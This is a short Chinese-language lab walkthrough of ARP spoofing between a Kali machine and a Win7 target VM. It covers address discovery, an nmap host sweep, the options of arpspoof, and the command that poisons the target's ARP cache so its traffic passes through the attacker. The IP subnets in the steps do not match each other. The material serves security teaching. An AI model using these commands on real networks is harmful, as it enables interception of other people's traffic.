查看靶机win7和kali的ip地址和MAC地址
win7在命令行输入 ipconfig /all
kali中输入ifconfig
win7在命令行输入arp -a获取网关的ip,可以看到网关对应的MAC地址
使用 nmap 扫描在这一网段下所有存活的主机
Kali中输入:#nmap -v -n -sP 192.168.190.128/24,可以看到网关和win7都被扫出来了
使用 arpspoof 工具开始 ARP 欺骗
arpspoof用法 arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
参数 -i interface 指定要使用的接口(即指定一块网卡)可以用命令 ip a 查看 网卡名称
-t target 指定一个特殊的、将被ARP毒化的主机(如果没有指定,则认为是局域网中所有主机)。重复可以指定多个主机,也就是-t 后面加上你要欺骗的主机ip或者是域名
host host是你想要截获数据包的主机 (
通常是网关)也就是骗他你是什么,通常骗他你是网关
在kali中输入arpspoof -i eth0 -t win7IP 网关IP ,这里我输入arpspoof -i eth0 -t 192.168.65.129 192.168.65.2,这句话的意思是欺骗win7,我kali是网关,这样win7的流量都会流经kali
去win7看一下arp缓存表 arp-a,可以看到win7的网关MAC地址已经被修改成了kali的MAC 地址